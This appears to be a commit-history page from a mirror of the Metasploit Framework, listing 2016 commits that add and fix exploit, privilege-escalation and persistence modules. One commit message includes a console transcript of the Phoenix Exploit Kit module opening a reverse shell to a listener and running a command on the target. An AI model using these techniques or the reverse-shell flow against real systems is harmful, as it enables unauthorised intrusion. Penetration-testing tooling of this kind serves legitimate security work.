infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
40,313 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

9909 Commits (d08aff2dcc0deea190a2db8c9f5705c89897f160)

Author SHA1 Message Date
nixawk 1ce9aedb97 parenthesis for condition expression 2016-09-13 03:37:47 -05:00
nixawk fd16c1c3b7 Fix issue-7295 2016-09-13 01:32:20 -05:00
aushack 11342356f8 Support LHOST for metasploit behind NAT 2016-09-13 11:23:49 +10:00
Brent Cook a81f351cb3
Land #7274, Remove deprecated modules 2016-09-09 12:01:59 -05:00
Justin Steven 6bafad44f2
drop 'require uri', tweak option text 2016-09-09 20:31:23 +10:00
Justin Steven 0b012c2496
Combine Unix and Windows modules 2016-09-09 20:28:13 +10:00
William Vu 7d44bd5ba4 Clean up module 2016-09-06 23:30:58 -05:00
aushack 015b790295 Added default rport. 2016-09-07 14:24:07 +10:00
catatonic c06ee991ed Adding WiFi pineapple command injection via authenticaiton bypass. 2016-09-06 17:22:25 -07:00
catatonic 8d40dddc17 Adding WiFi pineapple preconfig command injection module. 2016-09-06 17:18:36 -07:00
EgiX df5fdbff41 Add module for KIS-2016-07: SugarCRM REST PHP Object Injection 
This PR contains a module to exploit KIS-2016-07, a PHP Object Injection vulnerability in SugarCRM CE before version 6.5.24 that allows unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. Successful exploitation of this vulnerability should require SugarCRM to be running on PHP before version 5.6.25 or 7.0.10, which fix CVE-2016-7124.
 2016-09-07 01:58:41 +02:00
Quentin Kaiser e4d118108a Trend Micro SafeSync exploit. 2016-09-06 19:33:23 +00:00
William Vu fed2ed444f Remove deprecated modules 
psexec_psh is undeprecated because users have been reporting
idiosyncrasies between it and psexec in the field.
 2016-09-03 12:43:01 -05:00
Justin Steven ea220091ea
add metasploit_webui_console_command_execution 
These modules target the Metasploit Community/Express/Pro Web UI on
Unix and Windows via the diagnostic console feature
 2016-09-03 09:12:09 +10:00
Mehmet Ince ba6c2117cf
Fix msftidy issues 2016-09-02 18:18:43 +03:00
Mehmet Ince 144fb22c32
Add Kaltura PHP Remote Code Execution module 2016-09-02 18:09:53 +03:00
Jan Mitchell 411689aa44 Adding changes to Samba exploit to target MIPSBE (this is for OpenWRT on a router 2016-09-01 10:05:13 +01:00
wchen-r7 445a43bd97 Trim the fat 2016-08-30 15:56:51 -05:00
wchen-r7 1b505b9b67 Fix #7247, Fix GlassFish on Windows targets 
Fix #7247
 2016-08-30 15:46:08 -05:00
William Vu 7a412031e5 Convert phoenix_exec to ARCH_PHP 2016-08-29 14:14:22 -05:00
William Vu 43a9b2fa26
Fix missing return 
My bad.
 2016-08-29 14:13:18 -05:00
William Vu d50a6408ea
Fix missed Twitter handle 2016-08-29 13:46:26 -05:00
William Vu f8fa090ec0
Fix one more missed comma 2016-08-29 13:40:55 -05:00
William Vu 53516d3323
Fix #7220, phoenix_exec module cleanup 2016-08-29 13:28:15 -05:00
h00die 748c959cba forgot to save before PR 2016-08-25 21:45:17 -04:00
h00die 5dff01625d working code 2016-08-25 21:32:25 -04:00
Pearce Barry 226ded8d7e
Land #6921, Support basic and form auth at the same time 2016-08-25 16:31:26 -05:00
h00die f2e2cb6a5e cant transfer file 2016-08-21 19:42:29 -04:00
h00die 6306fa5aa5 Per discussion in #7195, trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe) 2016-08-21 19:16:04 -04:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution 
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
 2016-08-19 21:29:55 +08:00
William Webb 3eb3c5afa2
Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
William Vu 2b6576b038
Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f
Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 4228868c29 Clean up after yourself 
Can't use FileDropper. :(
 2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload 
pl is a cheap replacement.
 2016-08-16 23:08:53 -05:00
William Vu b3402a45f7 Add generic payloads 
Useful for testing and custom stuff.
 2016-08-16 23:08:09 -05:00
William Vu 2fed51bb18
Land #7115, Drupal CODER exploit 2016-08-15 01:15:23 -05:00
William Vu 62d28f10cb Clean up Mehmet modules 2016-08-15 01:12:58 -05:00
Brent Cook d34579f1f0
Land #7203, Fix struts_default_action_mapper payload request delay 2016-08-12 23:00:44 -05:00
Brent Cook 1733d3e1f1 remove obsolete tested-on comment 2016-08-12 17:26:43 -05:00
Pearce Barry 1e7663c704
Land #7200, Rex::Ui::Text cleanup 2016-08-12 16:22:55 -05:00
Mehmet Ince b4846e5793
Enabling cmd_bash payload type with bash-tcp cmd 2016-08-13 00:14:25 +03:00
Mehmet Ince d38e9f8ceb
Using # instead of ;. Semicolon is causing msg in error.log. 2016-08-12 23:35:29 +03:00
wchen-r7 f4e4a5dcf3 Fix struts_default_action_mapper payload request delay 
MS-1609
 2016-08-12 15:29:00 -05:00
Mehmet Ince ba79579202
Extending Space limitation up to 250 2016-08-12 22:32:49 +03:00
Brendan 1a7286f625
Land #7062, Create exploit for WebNMS 5.2 RCE 2016-08-12 07:11:48 -07:00
David Maloney eb73a6914d
replace old rex::ui::text::table refs 
everywhere we called the class we have now rewritten it
to use the new namespace

MS-1875
 2016-08-10 13:30:09 -05:00
Yorick Koster b7049939d9 Fixed more build errors 2016-08-09 12:55:18 +02:00
Yorick Koster 22054ce85c Fixed build errors 2016-08-09 12:47:08 +02:00
Yorick Koster b935e3df2e Office OLE Multiple DLL Side Loading Vulnerabilities 
Multiple DLL side loading vulnerabilities were found in various COM
components.
These issues can be exploited by loading various these components as an
embedded
OLE object. When instantiating a vulnerable object Windows will try to
load one
or more DLLs from the current working directory. If an attacker
convinces the
victim to open a specially crafted (Office) document from a directory
also
containing the attacker's DLL file, it is possible to execute arbitrary
code with
the privileges of the target user. This can potentially result in the
attacker
taking complete control of the affected system.
 2016-08-09 12:29:08 +02:00
wchen-r7 c64e1b8fe6
Land #7181, NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance 2016-08-08 16:04:33 -05:00
wchen-r7 cb04ff48bc
Land #7180, Add exploit for CVE 2016-5674 / Nuuo / Netgear unauth RCE 2016-08-08 15:55:39 -05:00
wchen-r7 8654baf3dd
Land #6880, add a module for netcore/netdis udp 53413 backdoor 2016-08-08 15:43:34 -05:00
wchen-r7 f98efb1345 Fix typos 2016-08-08 15:41:03 -05:00
Quentin Kaiser 1320647f31 Exploit for Trend Micro Smart Protection Server (CVE-2016-6267). 2016-08-08 18:47:46 +00:00
wchen-r7 3d1289dac3
Land #7185, Add VMware Host Guest Client Redirector DLL Hijack Exploit 2016-08-08 11:41:40 -05:00
wchen-r7 51c457dfb3 Update vmhgfs_webdav_dll_sideload 2016-08-08 11:40:03 -05:00
Pedro Ribeiro 3b64b891a6 Update nuuo_nvrmini_unauth_rce.rb 2016-08-05 21:53:25 +01:00
Pedro Ribeiro 746ba4d76c Add bugtraq reference 2016-08-05 21:53:08 +01:00
Steven Seeley 230903562f Add Samsung Security Manager 1.5 ActiveMQ Broker exploit 2016-08-05 15:19:22 -05:00
Yorick Koster dae1679245 Fixed build warnings 2016-08-05 20:40:41 +02:00
Yorick Koster 02e065dae6 Fixed disclosure date format 2016-08-05 20:32:58 +02:00
Yorick Koster 97d11a7041 Exploit module for CVE-2016-5330 VMware Host Guest Client Redirector DLL hijack 2016-08-05 20:19:40 +02:00
Pedro Ribeiro 07e210c143 Add changes requested to target.uri 2016-08-04 17:50:16 +01:00
Pedro Ribeiro 2aca610095 Add github link 2016-08-04 17:38:31 +01:00
Pedro Ribeiro 7d8dc9bc82 Update nuuo_nvrmini_unauth_rce.rb 2016-08-04 17:38:14 +01:00
Pedro Ribeiro b48518099c add exploit for CVE 2016-5674 2016-08-04 16:55:21 +01:00
Pedro Ribeiro 0deac80d61 add exploit for CVE 2016-5675 2016-08-04 16:54:38 +01:00
wchen-r7 14a387e4eb
Land #7163, Add exploit payload delivery via SMB 2016-08-03 14:44:59 -05:00
wchen-r7 2f6e0fb58c
Land #7172, Add exploit for CVE-2016-0189 (MSIE) 2016-08-03 14:14:16 -05:00
wchen-r7 e16c57ed07 Lower rank 2016-08-03 14:02:47 -05:00
wchen-r7 96dbf627ae Remove unwanted metadata for HttpServer 2016-08-03 13:55:58 -05:00
William Webb be4f55aa2f forgot to update ranking 2016-08-02 13:30:12 -05:00
William Webb 4c15e5e33a
Land #7171, Hint about incorrect RAILSVERSION 2016-08-01 15:40:27 -05:00
Brent Cook abf435d6c2
Land #6960, Auth bypass for Polycom HDX video endpoints 2016-08-01 14:02:50 -05:00
Brent Cook 5309f2e4fb endpoints, not end points 2016-08-01 14:02:17 -05:00
Brent Cook b34201e65c restore session as an instance variable 2016-08-01 13:58:54 -05:00
William Webb ba0da52274 msftidy cleanup 2016-08-01 13:36:05 -05:00
William Webb 21e6211e8d add exploit for cve-2016-0189 2016-08-01 13:26:35 -05:00
William Vu 3b13adba70 Hint about incorrect RAILSVERSION 
If the secret doesn't match, you might have set the wrong RAILSVERSION.
The difference is secret_token (Rails 3) vs. secret_key_base (Rails 4).
 2016-08-01 09:36:25 -07:00
James Lee d46c3a1d8c
Collector looks like hex, store it as a string 2016-07-29 21:57:51 -05:00
Andrew Smith 1d6fa11c4f Addition of SMB delivery module 2016-07-29 14:58:30 -04:00
wchen-r7 1e1866f583 Fix #7158, tiki_calendar_exec incorrectly reports successful login 
Fix #7158
 2016-07-28 17:03:31 -05:00
Vex Woo 864989cf6c For echo command 2016-07-26 20:27:23 -05:00
Brendan 4720d77c3a
Land #6965, centreon useralias exec 2016-07-26 15:02:36 -07:00
Mehmet Ince dadafd1fdf
Use data:// instead of bogus web server and check() improvements. 2016-07-26 13:31:46 +03:00
wchen-r7 1016cb675d
Land #7107, Use VHOST info for redirection in firefox_proto_crmfrequest 2016-07-24 15:50:21 -05:00
wchen-r7 72caeaa72f Fix redirect url 2016-07-24 15:49:03 -05:00
Mehmet Ince 780e83dabb
Fix for Opt params and Space limits 2016-07-22 20:48:15 +03:00
Mehmet Ince 7e9c5f9011
Fix for double space and indentation 2016-07-21 20:27:52 +03:00
Mehmet Ince 634ee93de4
Add Drupal CODER remote command execution 2016-07-21 20:23:54 +03:00
William Vu 32f1c83c9e Switch to single quotes 
Might as well, since we're avoiding escaping.
 2016-07-21 00:10:17 -05:00
William Vu 2e631cab5b Prefer quoting over escaping 
Having to escape backslashes in a single-quoted string sucks.
 2016-07-21 00:02:08 -05:00
William Vu c6b309d5c9 Fix drupal_restws_exec check method false positive 2016-07-20 23:28:49 -05:00
William Vu 8bd6db8bd7
Land #7108, Drupal RESTWS exploit 2016-07-20 13:49:37 -05:00
William Vu b49a847c98 Fix additional things 2016-07-20 13:49:23 -05:00
Mehmet Ince 51bb950201
Avoid return where not required 2016-07-20 21:27:51 +03:00
Mehmet Ince b0a0544627
Remove random string from URI 2016-07-20 20:50:10 +03:00
Pedro Ribeiro c93e88f3a3 Make changes requested by wvu-r7 2016-07-20 14:21:04 +02:00
James Lee b057a9486c
Don't use ssh agent 2016-07-19 17:07:22 -05:00
James Lee ff63e6e05a
Land #7018, unvendor net-ssh 2016-07-19 17:06:35 -05:00
Mehmet Ince 089816236d
Remove double spaces and fix checkcode 2016-07-20 00:01:25 +03:00
Mehmet Ince 9c8e351ba8
Use vars_get un send_request_cgi 2016-07-19 20:12:14 +03:00
Mehmet Ince ec2f8fcc71
Change check method and use meterpreter instead of unix cmd 2016-07-19 11:13:06 +03:00
forzoni 6f35a04e21 Incorporate review fixes, ensure PrependFork is true, fix echo compat. 2016-07-19 01:45:56 -05:00
Mehmet Ince 650034b600
Use normalize_uri params instead of string concatenation 2016-07-19 01:01:05 +03:00
Mehmet Ince c8deb54938
Add Drupal RESTWS Remote Unauth PHP Code Exec 2016-07-18 21:32:10 +03:00
RageLtMan 14c9569afa 2013-1710 - Use header VHOST info for redirection 
When this exploit is hit by hostname, the HTTP request contains
a Host header field which does not match the IP-based redirection.
Update the module to check request headers for host information,
and fallback to the prior behavior if none exists.

Tested in conjunction with #6611 DNS spoofer - works great, see
issue #7098 for details.
 2016-07-17 04:50:54 -04:00
Brent Cook b08d1ad8d8
Revert "Land #6812, remove broken OSVDB references" 
This reverts commit 2b016e0216, reversing
changes made to 7b1d9596c7.
 2016-07-15 12:00:31 -05:00
h00die 03dca5fee2 updates round 2 2016-07-15 09:02:23 -04:00
h00die 33ce3ec3ed fixes round 2 2016-07-15 08:44:39 -04:00
Brendan 8968a6603e Syntax cleanup 2016-07-14 13:25:31 -07:00
Brendan 927b3a88a1 Changed to one delete 2016-07-14 13:11:59 -07:00
David Maloney b6b52952f4
set ssh to non-interactive 
have to set the non-interactive flag so that it does not
prompt the user on an incorrect password

MS-1688
 2016-07-14 11:12:03 -05:00
David Maloney 01d0d1702b
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-07-14 09:48:28 -05:00
William Vu b2c3267a2a
Land #7042, fetch_ninja_form_nonce/wponce fix 2016-07-13 11:38:11 -05:00
wchen-r7 8f928c6ca1
Land #7006, Add MS16-032 Local Priv Esc Exploit 2016-07-12 15:22:35 -05:00
wchen-r7 815c426b4d Match naming style 2016-07-12 15:18:39 -05:00
wchen-r7 f11b84f106 Update wfsdelay and check for ms16-032 2016-07-12 15:17:21 -05:00
William Vu f164afaef8
Land #6932, joomla_contenthistory_sqli_rce fixes 2016-07-12 14:26:49 -05:00
William Vu 310332b521 Clean up module 2016-07-12 11:17:10 -05:00
wchen-r7 b869b890c7
Land #7090, Add module for Tikiwiki Upload Exec 2016-07-12 11:16:50 -05:00
wchen-r7 2471e8bc8c Add FileDropper to cleanup properly 2016-07-12 11:16:18 -05:00
William Vu 277950cc79
Land #6733, psexec StackAdjustment fix 2016-07-12 11:14:16 -05:00
Mehmet Ince 43833c8756
Fixing double normalize function call 2016-07-12 07:30:18 +03:00
Brent Cook 2b016e0216
Land #6812, remove broken OSVDB references 2016-07-11 22:59:11 -05:00
Brent Cook a530aa4cf1 restrict perms a bit more 2016-07-11 22:22:34 -05:00
Brent Cook a107a0f955 remove unneeded rport/rhost defines 2016-07-11 22:22:34 -05:00
Brent Cook 6bf51fe064 streamline payload generation 2016-07-11 22:22:34 -05:00
Brent Cook 7ef6c8bf9e ruby style updates 2016-07-11 22:22:33 -05:00
Brent Cook c1f51e7ddf Update and fixup module against OpenNMS-16 2016-07-11 22:22:33 -05:00
benpturner 50746eec29 Fixes comments in regards to #{peer} 2016-07-11 22:22:33 -05:00
benpturner ce8317294f New module to exploit the OpenNMS Java Object Unserialization RCE vulnerability. This now gets flagged inside Nessus and there was no Metasploit module to exploit this. 
This module exploits the vulnerability to a full session.
 2016-07-11 22:22:32 -05:00
khr0x40sh 7211936f96 Fix Payload exit issue 
Fixed payload exiting issue by adding while ($true){Start-Sleep 1000};
statement.
 2016-07-11 16:21:08 -04:00
Mehmet Ince fc56ab6722
Fixing some coding style because of rubocop 2016-07-11 23:10:18 +03:00
Brendan 47f2cef22e Syntax changes to humor rubocop and ruby style 2016-07-11 12:50:58 -07:00
Mehmet Ince e79c3ba7c0
Tiki Wiki unauth rce 2016-07-11 22:44:07 +03:00
William Webb 52c6daa0f2
Land #7048, Riverbed SteelCentral NetProfiler and NetExpress Remote 
Command Injection
 2016-07-10 18:54:12 -05:00
Francesco b75084249a Removed duplicate 'Privileged' key 2016-07-10 01:37:03 -04:00
sho-luv 25f49c0091 Fixed Description 
Just cleaned up Description.
 2016-07-08 16:17:39 -07:00
wchen-r7 d0e1c67c18
Land #7026, Add Action Pack render exploit CVE-2016-2098 2016-07-07 16:16:37 -05:00
wchen-r7 2cc6565cc9 Update rails_actionpack_inline_exec 2016-07-07 15:56:50 -05:00
wchen-r7 fee361dae0
Land #7075, Add ms16-016 local privilege escalation 2016-07-06 12:01:01 -05:00
wchen-r7 532ea5d4c4 Make sure there's a ref and checkcode 2016-07-06 12:00:20 -05:00
wchen-r7 45401bfe45
Land #7069, modify check codes in multiple local exploits 2016-07-06 00:04:24 -05:00
William Webb b4b3a84fa5 refactor ms16-016 code 2016-07-05 20:50:43 -05:00
David Maloney 5f9f3259f8
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-07-05 10:48:38 -05:00
Brendan e29d5b9efe
Land #6954, Fix the available size of payload for exploit/.../payload_inject 2016-07-05 07:38:27 -07:00
Clément Notin 0f8efec001 Fix modules broken by @wchen-r7 's 4275a65407 commit. 
These modules call check() in the exploit() function and expected to get a CheckCode::Vulnerable, now that check() returns Appears instead of Vulnerable they always refuse to run.
I've flipped the logic, based on examples in other modules, now they refuse to run only if check() positively returns Safe.
 2016-07-05 13:49:14 +02:00
Pedro Ribeiro eeba35f87a Create file for WebNMS 5.2 remote code execution 2016-07-04 21:07:03 +01:00
Pearce Barry 12812650c0
Land #7054, Fix busted alpha encoding on ms02_018_htr 2016-07-02 17:07:25 -05:00
Francesco 4ed12d7077 Added: support for credentials saving using report_cred method as suggested 
Added: support for detection of valid user credentials to skip login SQLi if not necessary.
 2016-07-02 01:41:13 -04:00
James Lee 3850431966
Fix busted alpha encoding on this old-ass exploit 2016-07-01 17:20:00 -05:00
Brendan 70a79bb0e8
Land #7014, Nagios remote root shell exploit 2016-07-01 08:17:38 -07:00
William Vu a1bd640eff Fix hashrocket alignment 2016-07-01 09:05:03 -05:00
William Vu 9663f88fdc Download profile.zip instead of including it 
profile.zip is GPL-licensed...
 2016-07-01 01:17:23 -05:00
William Webb 1401a61f59
Land #6998, Fix #6984 Undefined method 'winver' in ms10_092_schelevator 2016-06-30 16:14:09 -05:00
wchen-r7 1ecef265a1 Do a fail_with in case nonce is not found at all 2016-06-30 11:21:45 -05:00
wchen-r7 e2b9225907 Fix #7022, Failing to find wpnonce in fetch_ninja_form_nonce 
This patch fixes a problem when the module is used against an older
version of ninja forms (such as 2.9.27), the nonce is found in a
hidden input instead of the JavaScript code, which actually causes
an undefined method 'gsub' bug in the module.

Fix #7022
 2016-06-30 11:15:38 -05:00
Tod Beardsley d1281b6594
Chmod to remove the exec bit. 2016-06-30 10:43:46 -04:00
Francesco 068a4007de Riverbed SteelCentral NetProfiler & NetExpress Exploit Module 
Changes to be committed:
    new file:   modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
 2016-06-29 22:27:40 -04:00
William Vu 68bd4e2375 Fire and forget the shell 
Edge case where reverse_perl returns 302 when app is unconfigured.
 2016-06-29 14:51:05 -05:00
forzoni d414ea59c3 Remove bash dependency. Oops. 2016-06-28 22:39:45 -05:00
David Maloney 3d93c55174
move sshfactory into a mixin method 
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention

MS-1688
 2016-06-28 15:23:12 -05:00
David Maloney ee2d1d4fdc
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-06-28 15:00:35 -05:00
forzoni 5f044ffda0 s/print_warning/print_error. 2016-06-28 10:26:23 -05:00
forzoni 0635fee820 Move some log lines to vprint_status. 2016-06-28 03:28:41 -05:00
forzoni 6c11692b04 Add privilege escalation for host users that can access the docker daemon. 2016-06-28 03:24:41 -05:00
RageLtMan fcf8cda22f Add basic module for CVE-2016-2098 
ActionPack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2
implement unsafe dynamic rendering of inline content such that
passing ERB wrapped Ruby code leads to remote execution.

This module only implements the Ruby payloads, but can easily
be extended to use system calls to execute native/alternate
payload types as well.

Test Procedures:
  Clone https://github.com/hderms/dh-CVE_2016_2098
  Run bundle install to match gem versions to those in lockfile
  Run the rails server and configure the metasploit module:
    Set TARGETURI to /exploits
    Configure payload and handler options
  Execute the module, move on to post-exp
 2016-06-28 03:28:16 -04:00
William Vu 5f08591fef Add Nagios XI exploit 2016-06-27 15:17:18 -05:00
Scott Lee Davis 2480781409 pesky pry. 2016-06-27 01:55:49 -04:00
Scott Lee Davis c2b4e22b46 updated with discovered changes from k kali & documentation update changes requested. 2016-06-27 01:53:20 -04:00
h00die 1c20122648 fedora compatibility, added naming options 2016-06-25 08:43:55 -04:00
James Lee 15a1a9ed71
Raise if payload.arch doesn't match expected 
This is necessary when payload is a generic/* since we can't actually
figure out what we need the prefix/suffix to be because the generics are
a pain to extract the arch/platform info out of.

Also remove some unnecessary options.
 2016-06-24 16:08:47 -05:00
David Maloney 6c3871bd0c
update ssh modules to use new SSHFactory 
updated all of our SSh based module to use the
new SSHFactory class to plug Rex::Sockets into
Net::SSH

MS-1688
 2016-06-24 13:55:28 -05:00
Scott Davis 3fb9eae687 EOL space if a ruby devil. 2016-06-23 15:40:16 -07:00
Scott Davis b38b116c9a @ePaul comments added to description. 2016-06-23 15:33:11 -07:00
Tod Beardsley 08d08d2c95
Fix Java payload generator 2016-06-23 14:51:26 -05:00
Tod Beardsley 464808d825
First, put the RC data in the module proper 2016-06-23 14:43:37 -05:00
Tod Beardsley 92c70dab6f
Real array, and fix PHP 2016-06-23 13:22:21 -05:00
Tod Beardsley ffabf26593
No Automatic target. 2016-06-23 12:50:23 -05:00
Tod Beardsley 7a36d03fe3
Trying multi arch 2016-06-23 12:34:51 -05:00
Scott Lee Davis 47674c77ad chmod 644 swagger_param_inject.rb 2016-06-23 11:49:16 -04:00
Scott Lee Davis fbd0bc4308 updated as per @egypt & @todb-r7 recommendations. 2016-06-23 11:41:54 -04:00
khr0x40sh 40d7de05ef Fix Payload Generation 
Payload generation now only occurs once and function 'setup_pay'
removed.  Payload is generated with cmd_psh_payload and is mutated to
fit dropped text file.
 2016-06-23 11:20:22 -04:00
Tod Beardsley fc79f3a2a9
Modify for only NodeJS 
Not sure if we can do multiple arch's in the same module. Doesn't look
like it's possible today.

See rapid7#7015
 2016-06-23 10:14:57 -05:00
Scott Davis 579a3bcf7c default payload is NOT text based, so do nothing with it. 2016-06-23 07:00:14 -07:00
Scott Davis 47e4321424 CVE-2016-5641 2016-06-23 06:09:37 -07:00
h00die 18a3bf5f62 service persistence 2016-06-22 19:22:18 -04:00
wchen-r7 de5152401a
Land #6992, Add tiki calendar exec exploit 2016-06-22 11:18:14 -05:00
wchen-r7 8697d3d6fb Update tiki_calendar_exec module and documentation 2016-06-22 11:17:45 -05:00
khr0x40sh df1a9bee13 Move ps1, Use Env var, Fix license, New Cleanup 
MS16-032 ps1 moved to external file.  This ps1 will now detect windir
to find cmd.exe.  The module now also detects windir to find
powershell.exe.  The license is now BSD_LICENSE, and the required
copyright has been moved to the ps1. The previous optional cleanup stage
 is now standard.  The optional 'W_PATH' assignment is corrected to
select the user's variable unless 'W_PATH' is nil.
 2016-06-22 09:25:48 -04:00
h00die 0f2c1d886c append over read and write 2016-06-21 16:56:34 -04:00
h00die 9cb57d78d7 updated check and docs that 14.2 may not be vuln 2016-06-21 16:48:09 -04:00
khr0x40sh b9d0bcc193 Add MS16-032 Local Priv Esc Exploit to tree 
This module will use the powershell port of ms16-032 created by
@FuzzySec.  All payloads are pushed to a compress powershell script in a
plain text file on the disk to execute.
 2016-06-21 14:56:12 -04:00
h00die c7bacebd5b slight issues found by void-in 2016-06-21 05:12:10 -04:00
h00die 4b8f572976 cron persistence 2016-06-20 21:45:04 -04:00
h00die 15a3d739c0 fix per wchen 2016-06-20 17:57:10 -04:00
wchen-r7 2b85b210e9 Fix #6984, Undefined method 'winver' in ms10_092_schelevator 
Fix #6984
 2016-06-20 10:37:41 -05:00
William Vu 6cb2a6970e Fix unused SessionType in two modules 
Pretty sure it should be "shell."
 2016-06-19 23:41:34 -05:00
h00die 6fe7698b13 follow redirect automatically 2016-06-19 20:24:54 -04:00
h00die 3f25c27e34 2 void-in fixes of 3 2016-06-19 14:35:27 -04:00
h00die ddfd015310 functionalized calendar call, updated docs 2016-06-19 08:53:22 -04:00
h00die 3feff7533b tiki calendar 2016-06-18 13:11:11 -04:00
h00die ebde552982 gem version 2016-06-16 21:09:56 -04:00
Brendan Watters 9ea0b8f944
Land #6934, Adds exploit for op5 configuration command execution 2016-06-16 14:36:10 -05:00
William Vu ea988eaa72 Add setsid to persist the shell 
Prevents the watchdog from killing our session.
 2016-06-16 11:31:35 -05:00
h00die cfb034fa95 fixes all previously identified issues 2016-06-15 20:58:04 -04:00
h00die baa603b637 wvu-r7 rex sleep suggestions 2016-06-15 20:41:25 -04:00
Rob Fuller bca88d8443
Landing #6961 Regsvr32 SCT App Whitelist Bypass Server 
by @kn0

rts
 2016-06-15 15:28:02 -04:00
h00die 81fa068ef0 pulling out the get params 2016-06-15 12:27:31 -04:00
h00die 52db99bfae vars_post for post request 2016-06-15 07:24:41 -04:00
h00die 625d60b52a fix the other normalize_uri 2016-06-14 15:03:07 -04:00
h00die afc942c680 fix travis 2016-06-13 19:07:14 -04:00
h00die bd4dacdbc3 added Rank 2016-06-13 19:04:06 -04:00
h00die 72ed478b59 added exploit rank 2016-06-13 18:56:33 -04:00
h00die 40f7fd46f9 changes outlined by wvu-r7 2016-06-13 18:52:25 -04:00
William Webb 563b8206c5
Land #6962, Apache Continuum Exploit 2016-06-13 16:41:53 -05:00
Trenton Ivey 3a39d8020d Moving back to PSH option only 2016-06-13 12:44:21 -05:00
Trenton Ivey 52bbd22a81 Moving back to PSH option only 2016-06-13 12:10:48 -05:00
h00die f63273b172 email change 2016-06-11 21:05:34 -04:00
h00die bd6eecf7b0 centreon useralias first add 2016-06-11 20:57:18 -04:00
Trenton Ivey 8c7796c6d3 Module Cleanup 2016-06-11 18:12:42 -05:00
Trenton Ivey 46eff4c96d Added command option 2016-06-11 18:07:24 -05:00
William Vu ec1248d7af Convert to CmdStager 2016-06-10 20:42:01 -05:00
Trenton Ivey 6af3c4ab99 Added zero to Run method to prevent popup 2016-06-10 14:52:02 -05:00
William Vu 46239d5b0d Add Apache Continuum exploit 2016-06-09 22:35:38 -05:00
Trenton Ivey 17974d74e2 Removing space at end of line 2016-06-09 21:49:24 -05:00
Trenton Ivey 6cd1da414f Regsvr32.exe Application Whitelist Bypass Server 2016-06-09 21:15:07 -05:00
h00die d63dc5845e wvu-r7 comment fixes 2016-06-09 21:52:21 -04:00
h00die 16b4829d57 fixed socket.get issue 2016-06-09 21:36:21 -04:00
h00die 63db330a02 rubocop fixes, msftidy fixes 2016-06-09 21:03:57 -04:00
h00die 027f538300 original from EDB 2016-06-09 20:35:00 -04:00
Brent Cook b0bf901b22
Land #6950, avoid printing rhost:rport twice when using Msf::Exploit::Remote::SMB::Client 2016-06-09 16:35:09 -05:00
William Vu 6da8c22171 Rename hash method to crypt 
To avoid a conflict with Object#hash in Pro.

MS-1636
 2016-06-09 15:21:40 -05:00
ssyy201506 d470371694 fix the available size of payload for exploit/windows/local/payload_injection 2016-06-09 13:40:25 +09:00
wchen-r7 7cdadca79b
Land #6945, Add struts_dmi_rest_exec exploit 2016-06-08 23:16:46 -05:00
h00die 6f5edb08fe pull uri from datastore consistently 2016-06-08 20:28:36 -04:00
wchen-r7 52bcade72c Fix #6948, Modules using the SMB client are printing peer twice 
Fix #6948
 2016-06-08 12:16:50 -05:00
wwebb-r7 ab27c1b701 Merge pull request #6940 from samvartaka/master 
Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too)
 2016-06-08 11:25:51 -05:00
samvartaka 5260031991 Modifications based on suggestions by @wchen-r7 2016-06-08 01:17:15 +02:00
Brendan Watters c4aa99fdac
Land #6925, ipfire proxy exec 2016-06-07 10:24:59 -05:00
